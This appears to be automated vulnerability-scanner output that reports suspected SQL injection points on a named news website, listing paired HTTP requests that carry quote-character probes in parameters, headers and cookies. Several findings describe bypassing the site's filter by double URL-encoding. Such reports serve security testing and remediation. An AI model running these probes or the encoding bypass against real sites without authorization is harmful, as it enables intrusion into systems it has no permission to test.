s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793781 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D%2527%2527; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/college-sports/ci_16793781?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:22:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:22:03 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 449
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. Note that Response 2 below is a 302 redirect rather than the article page, so the disappearance of the error should be confirmed against a stable article response before this is treated as a confirmed finding.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the source request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16793781?source=rss%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='But Auburn quarterback Cam Newton is considered the overwhelming favorite'><meta name="keyw ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16793781?source=rss%2527%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/college-sports/ci_16 ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527 Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_u cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%2527%2527; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669';
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669'';
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /college-sports/ci_16795084?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='No. 5 Duke womenedge Texas A&M'><meta name="keywords" content="college sports BCS san J ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /columns/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Today: Google will roll out Chrome OS notebooks next year, but you can apply for a public t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /columns/ci_16799883 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/columns/ci_16799883?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:45:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:45:25 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 442
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Prosecutors were barred from charging the Rev. Jerome Lindner with child molestation, even ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/crime-courts/ci_1679 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
